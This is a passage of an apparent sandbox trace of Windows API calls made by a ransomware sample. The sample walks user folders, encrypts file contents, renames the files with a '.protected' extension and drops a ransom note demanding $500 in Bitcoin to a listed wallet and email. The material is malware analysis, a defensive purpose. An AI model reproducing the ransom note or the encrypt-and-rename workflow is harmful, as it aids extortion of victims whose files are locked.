lpNumberOfBytesWritten=0x295e544*=0x2ac, lpOverlapped=0x0) returned 1 [0086.912] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0086.912] WriteFile (in: hFile=0x150, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e544*=0xb1, lpOverlapped=0x0) returned 1 [0086.912] CloseHandle (hObject=0x150) returned 1 [0086.912] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0086.912] lstrcmpiW (lpString1="desktop.ini", lpString2="Windows") returned -1 [0086.912] lstrcmpiW (lpString1="desktop.ini", lpString2="Program Files") returned -1 [0086.912] lstrcmpiW (lpString1="desktop.ini", lpString2="Program Files (x86)") returned -1 [0086.912] lstrcmpiW (lpString1="desktop.ini", lpString2="$Recycle.bin") returned 1 [0086.913] lstrcmpiW (lpString1="desktop.ini", lpString2="System Volume Information") returned -1 [0086.913] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\desktop.ini") returned 101 [0086.913] StrStrIW (lpFirst="desktop.ini", lpSrch=".protected") returned 0x0 [0086.913] lstrcmpW (lpString1="desktop.ini", lpString2="RESTORE_FILES.txt") returned -1 [0086.913] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0086.913] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0086.913] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\temporary internet files\\content.ie5\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0086.914] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\desktop.ini") returned 101 [0086.914] StrStrW (lpFirst="desktop.ini", lpSrch=".txt") returned 0x0 [0086.914] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\desktop.ini") returned 101 [0086.914] StrStrW (lpFirst="desktop.ini", lpSrch=".rar") returned 0x0 [0086.914] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\desktop.ini") returned 101 [0086.914] StrStrW (lpFirst="desktop.ini", lpSrch=".zip") returned 0x0 [0086.914] ReadFile (in: hFile=0x150, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295e7b4*=0x43, lpOverlapped=0x0) returned 1 [0086.915] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xffffffbd, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0086.915] WriteFile (in: hFile=0x150, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295e7b4*=0x43, lpOverlapped=0x0) returned 1 [0086.916] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.916] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0086.916] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0086.916] CloseHandle (hObject=0x150) returned 1 [0086.917] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\desktop.ini.protected") returned 111 [0086.917] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\temporary internet files\\content.ie5\\desktop.ini"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\desktop.ini.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\temporary internet files\\content.ie5\\desktop.ini.protected")) returned 1 [0086.919] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0086.919] lstrcmpiW (lpString1="index.dat", lpString2="Windows") returned -1 [0086.919] lstrcmpiW (lpString1="index.dat", lpString2="Program Files") returned -1 [0086.919] lstrcmpiW (lpString1="index.dat", lpString2="Program Files (x86)") returned -1 [0086.919] lstrcmpiW (lpString1="index.dat", lpString2="$Recycle.bin") returned 1 [0086.919] lstrcmpiW (lpString1="index.dat", lpString2="System Volume Information") returned -1 [0086.919] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\index.dat") returned 99 [0086.919] StrStrIW (lpFirst="index.dat", lpSrch=".protected") returned 0x0 [0086.919] lstrcmpW (lpString1="index.dat", lpString2="RESTORE_FILES.txt") returned -1 [0086.919] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0086.919] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0086.919] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\index.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\temporary internet files\\content.ie5\\index.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0086.920] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\index.dat") returned 99 [0086.920] StrStrW (lpFirst="index.dat", lpSrch=".txt") returned 0x0 [0086.920] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\index.dat") returned 99 [0086.920] StrStrW (lpFirst="index.dat", lpSrch=".rar") returned 0x0 [0086.920] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\index.dat") returned 99 [0086.920] StrStrW (lpFirst="index.dat", lpSrch=".zip") returned 0x0 [0086.920] ReadFile (in: hFile=0x150, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295e7b4*=0x2800, lpOverlapped=0x0) returned 1 [0086.922] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0086.922] WriteFile (in: hFile=0x150, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295e7b4*=0x2800, lpOverlapped=0x0) returned 1 [0086.923] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.923] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0086.923] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0086.923] CloseHandle (hObject=0x150) returned 1 [0086.924] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\index.dat.protected") returned 109 [0086.924] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\index.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\temporary internet files\\content.ie5\\index.dat"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\index.dat.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\temporary internet files\\content.ie5\\index.dat.protected")) returned 1 [0086.924] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0086.924] lstrcmpiW (lpString1="KETAJP6D", lpString2="Windows") returned -1 [0086.924] lstrcmpiW (lpString1="KETAJP6D", lpString2="Program Files") returned -1 [0086.924] lstrcmpiW (lpString1="KETAJP6D", lpString2="Program Files (x86)") returned -1 [0086.924] lstrcmpiW (lpString1="KETAJP6D", lpString2="$Recycle.bin") returned 1 [0086.924] lstrcmpiW (lpString1="KETAJP6D", lpString2="System Volume Information") returned -1 [0086.925] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\KETAJP6D") returned 98 [0086.925] lstrcmpW (lpString1="KETAJP6D", lpString2=".") returned 1 [0086.925] lstrcmpW (lpString1="KETAJP6D", lpString2="..") returned 1 [0086.925] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\KETAJP6D\\*") returned 100 [0086.925] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\KETAJP6D\\*", lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 0x47bad0 [0086.925] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0086.925] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0086.925] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0086.925] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0086.925] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0086.925] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\KETAJP6D\\.") returned 100 [0086.925] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0086.925] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0086.925] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0086.925] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0086.925] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0086.925] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\KETAJP6D\\." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\temporary internet files\\content.ie5\\ketajp6d\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0086.925] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0086.925] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0086.925] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0086.925] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0086.925] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0086.926] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0086.926] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\KETAJP6D\\..") returned 101 [0086.926] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0086.926] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0086.926] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0086.926] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0086.926] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0086.926] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0086.926] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\KETAJP6D\\.." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\temporary internet files\\content.ie5"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0086.926] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0086.926] lstrcmpiW (lpString1="desktop.ini", lpString2="Windows") returned -1 [0086.926] lstrcmpiW (lpString1="desktop.ini", lpString2="Program Files") returned -1 [0086.926] lstrcmpiW (lpString1="desktop.ini", lpString2="Program Files (x86)") returned -1 [0086.926] lstrcmpiW (lpString1="desktop.ini", lpString2="$Recycle.bin") returned 1 [0086.926] lstrcmpiW (lpString1="desktop.ini", lpString2="System Volume Information") returned -1 [0086.926] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\KETAJP6D\\desktop.ini") returned 110 [0086.926] StrStrIW (lpFirst="desktop.ini", lpSrch=".protected") returned 0x0 [0086.926] lstrcmpW (lpString1="desktop.ini", lpString2="RESTORE_FILES.txt") returned -1 [0086.926] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0086.926] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0086.926] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\KETAJP6D\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\temporary internet files\\content.ie5\\ketajp6d\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0086.927] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\KETAJP6D\\desktop.ini") returned 110 [0086.927] StrStrW (lpFirst="desktop.ini", lpSrch=".txt") returned 0x0 [0086.927] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\KETAJP6D\\desktop.ini") returned 110 [0086.927] StrStrW (lpFirst="desktop.ini", lpSrch=".rar") returned 0x0 [0086.927] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\KETAJP6D\\desktop.ini") returned 110 [0086.927] StrStrW (lpFirst="desktop.ini", lpSrch=".zip") returned 0x0 [0086.927] ReadFile (in: hFile=0x154, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295e544*=0x43, lpOverlapped=0x0) returned 1 [0086.928] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0xffffffbd, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0086.928] WriteFile (in: hFile=0x154, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295e544*=0x43, lpOverlapped=0x0) returned 1 [0086.928] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.929] WriteFile (in: hFile=0x154, lpBuffer=0x295e51c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x295e51c*, lpNumberOfBytesWritten=0x295e544*=0x4, lpOverlapped=0x0) returned 1 [0086.929] WriteFile (in: hFile=0x154, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e544*=0x30, lpOverlapped=0x0) returned 1 [0086.929] CloseHandle (hObject=0x154) returned 1 [0086.929] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\KETAJP6D\\desktop.ini.protected") returned 120 [0086.929] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\KETAJP6D\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\temporary internet files\\content.ie5\\ketajp6d\\desktop.ini"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\KETAJP6D\\desktop.ini.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\temporary internet files\\content.ie5\\ketajp6d\\desktop.ini.protected")) returned 1 [0086.930] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 0 [0086.930] FindClose (in: hFindFile=0x47bad0 | out: hFindFile=0x47bad0) returned 1 [0086.930] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\KETAJP6D\\RESTORE_FILES.txt") returned 116 [0086.930] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\KETAJP6D\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\temporary internet files\\content.ie5\\ketajp6d\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0086.931] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0086.931] WriteFile (in: hFile=0x150, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e544*=0x53d, lpOverlapped=0x0) returned 1 [0086.932] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0086.932] WriteFile (in: hFile=0x150, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e544*=0x2ac, lpOverlapped=0x0) returned 1 [0086.932] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0086.932] WriteFile (in: hFile=0x150, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e544*=0xb1, lpOverlapped=0x0) returned 1 [0086.932] CloseHandle (hObject=0x150) returned 1 [0086.932] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0086.932] lstrcmpiW (lpString1="VB18B0KB", lpString2="Windows") returned -1 [0086.932] lstrcmpiW (lpString1="VB18B0KB", lpString2="Program Files") returned 1 [0086.932] lstrcmpiW (lpString1="VB18B0KB", lpString2="Program Files (x86)") returned 1 [0086.932] lstrcmpiW (lpString1="VB18B0KB", lpString2="$Recycle.bin") returned 1 [0086.932] lstrcmpiW (lpString1="VB18B0KB", lpString2="System Volume Information") returned 1 [0086.932] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\VB18B0KB") returned 98 [0086.932] lstrcmpW (lpString1="VB18B0KB", lpString2=".") returned 1 [0086.932] lstrcmpW (lpString1="VB18B0KB", lpString2="..") returned 1 [0086.932] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\VB18B0KB\\*") returned 100 [0086.932] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\VB18B0KB\\*", lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 0x47bad0 [0086.933] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0086.933] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0086.933] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0086.933] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0086.933] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0086.933] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\VB18B0KB\\.") returned 100 [0086.933] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0086.933] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0086.933] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0086.933] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0086.933] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0086.933] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet 